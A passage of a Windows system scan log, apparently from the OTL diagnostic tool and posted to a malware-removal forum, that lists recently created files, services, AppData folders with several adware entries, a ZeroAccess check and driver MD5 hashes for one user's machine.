C:\windows\tasks\MediaPlayerEnhance-validator.job [2014/02/09 12:39:43 | 000,002,465 | ---- | C] () -- C:\Users\APPE-ATELIER\Desktop\36 Dictionnaires et Recueils de Correspondance.lnk [2014/02/03 03:00:36 | 000,487,508 | ---- | C] () -- C:\monitor.exe [2014/01/17 12:53:39 | 000,000,290 | RHS- | C] () -- C:\Users\APPE-ATELIER\ntuser.pol [2013/12/21 16:24:03 | 000,000,127 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Roaming\WB.CFG [2013/10/31 18:57:27 | 000,000,079 | ---- | C] () -- C:\windows\wininit.ini [2013/08/27 08:42:27 | 000,033,864 | ---- | C] () -- C:\windows\Launcher.exe [2013/03/25 18:28:44 | 000,164,736 | ---- | C] () -- C:\windows\System32\drivers\aswVmm.sys [2013/03/25 18:28:44 | 000,049,248 | ---- | C] () -- C:\windows\System32\drivers\aswRvrt.sys [2012/03/26 09:52:15 | 000,021,240 | ---- | C] () -- C:\windows\System32\solidlocalmon.dll [2012/03/26 09:52:15 | 000,013,560 | ---- | C] () -- C:\windows\System32\solidlocalui.dll [2012/03/26 09:07:31 | 000,098,304 | ---- | C] () -- C:\windows\System32\redmonnt.dll [2012/02/28 08:46:49 | 000,001,684 | ---- | C] () -- C:\windows\System32\ASOROSet.bin [2012/02/19 08:51:43 | 000,000,041 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Offre.ini [2011/06/16 16:18:58 | 000,001,940 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Local\{96C87F53-AC72-4604-A9CC-186A49F17F3C}.ini [2011/05/24 15:19:12 | 000,098,304 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Local\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.ini [2011/03/07 09:00:09 | 000,001,849 | ---- | C] () -- C:\Users\APPE-ATELIER\AppData\Roaming\GhostObjGAFix.xml [2011/03/06 09:51:56 | 000,000,088 | RHS- | C] () -- C:\ProgramData\DF34F00615.sys [2011/02/12 17:27:24 | 000,002,828 | -HS- | C] () -- C:\ProgramData\KGyGaAvL.sys [2010/12/06 12:11:30 | 000,000,290 | RHS- | C] () -- C:\ProgramData\ntuser.pol [color=#E56717]========== ZeroAccess Check ==========[/color] [2009/07/14 05:42:31 | 000,000,227 | RHS- | M] () -- C:\windows\assembly\Desktop.ini [HKEY_CURRENT_USER\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] [HKEY_CURRENT_USER\Software\Classes\clsid\{fbeb8a05-beee-4442-804e-409d6c4515e9}\InProcServer32] [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{42aedc87-2188-41fd-b9a3-0c966feabec1}\InProcServer32] "" = %SystemRoot%\system32\shell32.dll -- [2013/07/26 02:55:59 | 012,872,704 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Apartment [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{5839FCA9-774D-42A1-ACDA-D6A79037F57F}\InProcServer32] "" = %systemroot%\system32\wbem\fastprox.dll -- [2010/11/20 13:19:02 | 000,606,208 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Free [HKEY_LOCAL_MACHINE\Software\Classes\clsid\{F3130CDB-AA52-4C3A-AB32-85FFC23AF9C1}\InProcServer32] "" = %systemroot%\system32\wbem\wbemess.dll -- [2009/07/14 02:16:17 | 000,342,528 | ---- | M] (Microsoft Corporation) "ThreadingModel" = Both [color=#E56717]========== Custom Scans ==========[/color] [color=#E56717]========== Base Services ==========[/color] SRV - [2009/07/14 02:14:53 | 000,062,464 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\aelupsvc.dll -- (AeLookupSvc) SRV - [2013/02/27 05:49:16 | 000,047,104 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\appinfo.dll -- (Appinfo) SRV - [2009/07/14 02:14:11 | 000,059,392 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\alg.exe -- (ALG) SRV - [2010/11/20 13:20:58 | 000,585,728 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\qmgr.dll -- (BITS) SRV - [2010/11/20 13:18:06 | 000,494,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\BFE.DLL -- (BFE) SRV - [2013/09/25 01:49:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\lsass.exe -- (KeyIso) SRV - [2009/07/14 02:15:19 | 000,271,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\es.dll -- (EventSystem) SRV - [2012/07/04 22:14:34 | 000,102,912 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\browser.dll -- (Browser) SRV - [2013/07/09 05:46:31 | 000,140,288 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\cryptsvc.dll -- (CryptSvc) SRV - [2010/11/20 13:21:03 | 000,376,832 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (DcomLaunch) SRV - [2010/11/20 13:18:30 | 000,254,464 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\dhcpcore.dll -- (Dhcp) SRV - [2011/03/03 06:38:01 | 000,132,608 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\dnsrslvr.dll -- (Dnscache) SRV - [2009/07/14 02:15:13 | 000,098,304 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\eapsvc.dll -- (EapHost) SRV - [2009/07/14 02:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\hidserv.dll -- (hidserv) SRV - [2009/07/14 02:15:33 | 000,300,544 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\ipnathlp.dll -- (SharedAccess) SRV - [2010/11/20 13:19:23 | 000,350,208 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\IPSECSVC.DLL -- (PolicyAgent) No service found with a name of MsMpSvc No service found with a name of NisSrv SRV - [2009/07/14 02:16:15 | 000,313,856 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\swprv.dll -- (swprv) SRV - [2009/07/14 02:15:41 | 000,049,664 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\Windows\System32\mmcss.dll -- (MMCSS) SRV - [2009/07/14 02:16:03 | 000,280,576 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\netman.dll -- (Netman) SRV - [2009/07/14 02:16:03 | 000,360,448 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\netprofm.dll -- (netprofm) SRV - [2012/10/03 17:42:26 | 000,242,176 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nlasvc.dll -- (NlaSvc) SRV - [2009/07/14 02:16:11 | 000,019,456 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\nsisvc.dll -- (nsi) SRV - [2011/05/24 11:44:59 | 000,293,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\umpnpmgr.dll -- (PlugPlay) SRV - [2012/02/11 06:37:49 | 000,317,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\spoolsv.exe -- (Spooler) SRV - [2013/09/25 01:49:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\lsass.exe -- (ProtectedStorage) No service found with a name of EMDMgmt SRV - [2009/07/14 02:16:12 | 000,090,624 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\rasauto.dll -- (RasAuto) SRV - [2010/11/20 13:21:00 | 000,286,208 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\rasmans.dll -- (RasMan) SRV - [2010/11/20 13:21:03 | 000,376,832 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\rpcss.dll -- (RpcSs) SRV - [2009/07/14 02:16:13 | 000,021,504 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\seclogon.dll -- (seclogon) SRV - [2013/09/25 01:49:20 | 000,022,016 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\lsass.exe -- (SamSs) SRV - [2009/07/14 02:16:20 | 000,073,728 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wscsvc.dll -- (wscsvc) SRV - [2010/11/20 13:21:26 | 000,168,960 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\srvsvc.dll -- (LanmanServer) SRV - [2010/11/20 13:21:19 | 000,328,192 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\shsvcs.dll -- (ShellHWDetection) No service found with a name of slsvc SRV - [2010/11/20 13:21:05 | 000,750,592 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\schedsvc.dll -- (Schedule) SRV - [2010/11/20 13:21:28 | 000,242,176 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\tapisrv.dll -- (TapiSrv) SRV - [2009/07/14 02:16:16 | 000,037,376 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\themeservice.dll -- (Themes) SRV - [2012/05/01 05:44:12 | 000,164,352 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\profsvc.dll -- (ProfSvc) SRV - [2010/11/20 13:17:51 | 001,025,536 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\VSSVC.exe -- (VSS) SRV - [2010/11/20 13:18:05 | 000,473,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (Audiosrv) SRV - [2010/11/20 13:18:05 | 000,473,600 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\audiosrv.dll -- (AudioEndpointBuilder) SRV - [2010/11/20 13:21:06 | 000,125,952 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\sdrsvc.dll -- (SDRSVC) SRV - [2013/05/27 05:57:27 | 000,680,960 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Program Files\Windows Defender\mpsvc.dll -- (WinDefend) SRV - [2010/11/20 13:21:35 | 001,086,976 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wevtsvc.dll -- (eventlog) SRV - [2010/11/20 13:19:40 | 000,566,272 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\MPSSVC.dll -- (MpsSvc) SRV - [2010/11/20 13:21:35 | 000,463,360 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wiaservc.dll -- (StiSvc) SRV - [2010/11/20 13:17:22 | 000,073,216 | ---- | M] (Microsoft Corporation) [Auto | Stopped] -- C:\windows\System32\msiexec.exe -- (msiserver) SRV - [2009/07/14 02:16:19 | 000,168,960 | ---- | M] (Microsoft Corporation) [On_Demand | Running] -- C:\Windows\System32\wbem\WMIsvc.dll -- (Winmgmt) SRV - [2012/06/02 23:19:17 | 001,933,848 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wuaueng.dll -- (wuauserv) SRV - [2010/11/20 13:18:34 | 000,214,016 | ---- | M] (Microsoft Corporation) [On_Demand | Stopped] -- C:\Windows\System32\dot3svc.dll -- (dot3svc) SRV - [2009/07/14 02:16:19 | 000,829,440 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wlansvc.dll -- (Wlansvc) SRV - [2010/11/20 13:21:36 | 000,084,480 | ---- | M] (Microsoft Corporation) [Auto | Running] -- C:\Windows\System32\wkssvc.dll -- (LanmanWorkstation) Invalid Environment Variable: ALLUSERSPROFILE\ [color=#A23BEC]< %ALLUSERSPROFILE%\Application Data\*.exe /s >[/color] [color=#A23BEC]< %APPDATA%\*. >[/color] [2013/05/27 12:58:33 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Adobe [2014/02/22 16:53:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Advanced System Protector [2013/12/30 21:02:02 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Aimersoft Video Converter Ultimate [2013/09/26 19:59:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\AVS4YOU [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\BabSolution [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\BabylonToolbar [2013/09/13 08:17:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\BatteryBar [2012/06/08 20:05:21 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Blitware [2011/02/03 13:18:38 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Canon [2013/05/27 10:25:15 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\com.adobe.formscentral.FormsCentralForAcrobat [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly [2011/03/06 09:51:56 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Corel [2013/04/12 09:18:51 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\CorelHomeOffice [2011/11/04 18:54:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Disk Cleaner [2014/02/22 17:20:29 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\dll-files.com [2013/11/26 17:53:28 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\dvdcss [2014/01/02 15:10:34 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\DVDVideoSoft [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\File Scout [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\FissaSearch [2013/05/27 14:09:54 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\FIXIO PC Utilities [2010/12/06 12:23:28 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\FLEXnet [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\GoforFiles [2010/12/11 21:24:11 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Google [2012/03/25 19:07:59 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Hewlett-Packard [2012/05/12 17:01:49 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Hitivi [2014/02/22 16:06:31 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\HomeTab [2013/04/27 11:08:33 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\hpqLog [2010/12/06 12:23:12 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Identities [2012/03/25 19:04:12 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\InstallShield [2010/12/06 15:28:35 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Macromedia [2014/02/22 14:57:57 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Malwarebytes [2013/01/04 12:00:13 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Micro Application [2013/11/30 22:01:52 | 000,000,000 | --SD | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft [2011/09/12 14:15:38 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Mozilla [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\newnext.me [2013/05/21 14:53:15 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Nuance [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy [2013/01/23 18:14:54 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenOffice.org [2013/09/29 09:01:22 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Opera Software [2013/05/27 10:28:18 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\PDAppFlex [2011/03/06 12:29:14 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\QuickZip [2013/04/27 10:45:40 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\RegistryKeys [2011/05/25 08:00:56 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Roxio [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\SimplyTech [2012/09/05 15:44:21 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Skype [2012/03/26 10:01:45 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\SolidDocuments [2014/02/22 14:58:00 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\SUPERAntiSpyware.com [2014/02/22 17:08:58 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\systweak [2011/09/29 13:31:56 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Tific [2013/05/31 14:08:08 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Topckit [2013/04/27 11:04:39 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\TuneUp Software [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\ValueApps [2014/02/22 16:06:36 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\vlc [2012/05/12 17:12:48 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Xilisoft Corporation [2012/02/10 19:13:13 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\XnView [2010/12/06 12:11:28 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\Zeon [2014/02/22 15:39:22 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\ZHP [2013/12/30 21:01:35 | 000,000,000 | ---D | M] -- C:\Users\APPE-ATELIER\AppData\Roaming\{950EB46C-6AC7-4ACC-AB36-9A6A77C08B6A} [color=#A23BEC]< %APPDATA%\*.exe /s >[/color] [2013/08/04 15:00:50 | 000,010,320 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\BabSolution\Shared\BabMaint.exe [2013/08/28 14:22:53 | 000,340,464 | ---- | M] (Babylon Ltd.) -- C:\Users\APPE-ATELIER\AppData\Roaming\BabSolution\Shared\GUninstaller.exe [2013/08/27 08:40:34 | 003,621,832 | ---- | M] (HomeTab ) -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\hometab.exe [2011/07/11 14:27:34 | 000,091,128 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\KeepMeUpdated.exe [2011/07/11 14:27:34 | 000,091,128 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Complitly\64\KeepMeUpdated.exe [2013/05/28 14:20:14 | 000,259,584 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\File Scout\filescout.exe [2013/06/21 16:16:14 | 000,062,902 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\File Scout\uninst.exe [2011/03/06 12:30:06 | 000,020,992 | R--- | M] (Quick Zip Dev) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\MediaPlayer.exe [2011/03/06 12:30:06 | 000,192,000 | R--- | M] (Quick Zip Dev) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\QuickZip.exe [2011/03/06 12:30:06 | 000,004,608 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\RunAsAdmin.exe [2011/03/06 12:30:06 | 000,155,136 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\ShellRegister.exe [2011/03/06 12:30:06 | 000,071,168 | R--- | M] (Quick Zip Dev) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{87AF4C0E-D953-424B-8108-3127CA217E6F}\Translator.exe [2013/01/07 15:09:28 | 000,010,134 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{C06EFB22-B5DB-46C5-9215-BCB5C19C0858}\ARPPRODUCTICON.exe [2013/01/07 15:09:28 | 000,053,248 | R--- | M] (Macrovision Corporation) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{C06EFB22-B5DB-46C5-9215-BCB5C19C0858}\NewShortcut1_C06EFB22B5DB46C59215BCB5C19C0858.exe [2012/02/11 21:53:40 | 000,010,134 | R--- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Installer\{CAE7D1D9-3794-4169-B4DD-964ADBC534EE}\ARPPRODUCTICON.exe [2011/12/30 19:54:46 | 000,183,096 | ---- | M] (Microsoft Corporation) -- C:\Users\APPE-ATELIER\AppData\Roaming\Microsoft\Outil de notification de cadeaux MSN\msnotif.exe [2013/04/02 19:33:26 | 000,773,104 | ---- | M] () -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy\4D4703175AF14432AB1D0EBE97BF4B63\DeltaTB.exe [2013/03/27 18:11:40 | 000,433,448 | ---- | M] (OpenCandy) -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy\4D4703175AF14432AB1D0EBE97BF4B63\OCBrowserHelper_1.0.6.124.exe [2012/12/28 03:40:08 | 006,151,296 | ---- | M] (Uniblue Systems Ltd ) -- C:\Users\APPE-ATELIER\AppData\Roaming\OpenCandy\D956304CC27E4E4898B1AC3CFDF2BE4A\speedupmypcFR.exe [color=#A23BEC]< %temp%\.exe /s >[/color] [color=#A23BEC]< %SYSTEMDRIVE%\*.exe >[/color] [2014/02/03 03:00:36 | 000,487,508 | ---- | M] () -- C:\monitor.exe [2013/03/11 20:19:10 | 000,401,408 | ---- | M] () -- C:\wget.exe [color=#A23BEC]< %systemroot%\*. /mp /s >[/color] [color=#A23BEC]< %systemroot%\system32\*.dll /lockedfiles >[/color] [1 C:\windows\system32\*.tmp files -> C:\windows\system32\*.tmp -> ] [color=#A23BEC]< %systemroot%\Tasks\*.job /lockedfiles >[/color] [color=#A23BEC]< %systemroot%\system32\drivers\*.sys /lockedfiles >[/color] [2014/01/08 07:09:36 | 000,020,480 | ---- | M] ()[b] Unable to obtain MD5[/b] -- C:\windows\system32\drivers\pcwatch.sys [color=#A23BEC]< %systemroot%\System32\config\*.sav >[/color] [2013/09/23 10:15:29 | 018,690,048 | ---- | M] () -- C:\windows\System32\config\system.sav [color=#A23BEC]< MD5 for: AGP440.SYS >[/color] [2009/07/14 02:26:15 | 000,053,312 | ---- | M] (Microsoft Corporation) MD5=507812C3054C21CEF746B6EE3D04DD6E -- C:\Windows\System32\drivers\AGP440.sys [2009/07/14 02:26:15 | 000,053,312 | ---- | M] (Microsoft Corporation) MD5=507812C3054C21CEF746B6EE3D04DD6E -- C:\Windows\System32\DriverStore\FileRepository\machine.inf_x86_neutral_a97a2a0d0fbc6696\AGP440.sys [2009/07/14 02:26:15 | 000,053,312 | ---- | M] (Microsoft Corporation) MD5=507812C3054C21CEF746B6EE3D04DD6E -- C:\Windows\winsxs\x86_machine.inf_31bf3856ad364e35_6.1.7601.17514_none_bc1a57271cf2f285\AGP440.sys [color=#A23BEC]< MD5 for: ATAPI.SYS >[/color] [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\drivers\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_a5025d31bee4647c\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\System32\DriverStore\FileRepository\mshdc.inf_x86_neutral_fab873f3e8a3315c\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.17514_none_df3f92057fcbe7a7\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.18231_none_df26d4d57fdef5b0\atapi.sys [2009/07/14 02:26:15 | 000,021,584 | ---- | M] (Microsoft Corporation) MD5=338C86357871C167A96AB976519BF59E -- C:\Windows\winsxs\x86_mshdc.inf_31bf3856ad364e35_6.1.7601.22414_none_dfc9143c98e9a6c4\atapi.sys [color=#A23BEC]< MD5 for: CNGAUDIT.DLL >[/color] [2009/07/14 02:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\System32\cngaudit.dll [2009/07/14 02:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b\cngaudit.dll [color=#A23BEC]< MD5 for: EXPLORER.EXE >[/color] [2011/02/26 06:19:21 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_54149f9ef14031fc\explorer.exe [2010/11/20 13:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_53bc10fdd7fe87ca\explorer.exe [2010/11/20 13:17:09 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_53bc10fdd7fe87ca\explorer.exe [2011/02/25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\explorer.exe [2011/02/25 06:30:54 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\x86_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_5389023fd8245f84\explorer.exe [color=#A23BEC]< MD5 for: IASTOR.SYS >[/color] [2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Program Files\Intel\Intel Matrix Storage Manager\driver\IaStor.sys [2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\swsetup\Drivers\32\HDD\IaStor.sys [2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\swsetup\INTELMSM\Winall\Driver\IaStor.sys [2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Windows\System32\drivers\iaStor.sys [2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Windows\System32\DriverStore\FileRepository\iaahci.inf_x86_neutral_edff5f7f3a6a240c\iaStor.sys [2010/01/08 22:34:12 | 000,331,288 | ---- | M] (Intel Corporation) MD5=D9D3F168A2FD4C2380D98821A3FF3357 -- C:\Windows\System32\DriverStore\FileRepository\iastor.inf_x86_neutral_ae92c2aaca5fffd6\iaStor.sys [2010/01/08 22:45:26 | 000,409,112 | ---- | M] (Intel Corporation) MD5=DC0B4553D089E2BD07AEBD9EA30BEAFB -- C:\Program Files\Intel\Intel Matrix Storage Manager\driver64\IaStor.sys [2010/01/08 22:45:26 | 000,409,112 | ---- | M] (Intel 